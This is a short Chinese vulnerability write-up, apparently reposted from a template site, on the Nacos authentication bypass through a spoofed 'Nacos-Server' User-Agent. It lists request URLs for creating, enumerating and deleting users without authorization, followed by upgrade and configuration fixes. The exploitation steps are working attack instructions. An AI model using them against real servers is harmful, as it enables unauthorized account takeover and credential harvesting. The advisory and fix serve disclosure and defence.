一、漏洞描述
Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过(nacos.core.auth.enabled=true)鉴权认证,从而进行API操作。
二、漏洞利用
-
访问
http://xxxxx/nacos/v1/auth/users?username=test&password=test
,并使用burpsuite进行抓包,将方法改为POST,返回“create user ok”即可未授权创建一个test/test
的用户,使用创建用户即可登入系统 -
访问
http://xxxxxxx/nacos/v1/auth/users?pageNo=1&pageSize=999
即可获取当前nacos系统存在的用户以及加密后的密码。文章来源:https://www.toymoban.com/news/detail-562481.html
-
访问
http://xxxxxxxx/nacos/v1/auth/users?username=test
,并使用burpsuite进行抓包,将方法改为DELETE,返回“delete user ok”即可未授权删除test
的用户文章来源地址https://www.toymoban.com/news/detail-562481.html
三、漏洞修复
- 升级nacos至1.4.1以上,建议升级至最新版本。
- 修改conf/application.properties字段。
仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!
到了这里,关于NACOS身份认证绕过的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!